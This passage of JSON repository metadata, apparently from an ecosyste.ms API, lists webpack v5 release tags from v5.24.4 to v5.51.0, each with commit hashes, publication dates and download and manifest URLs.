gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyst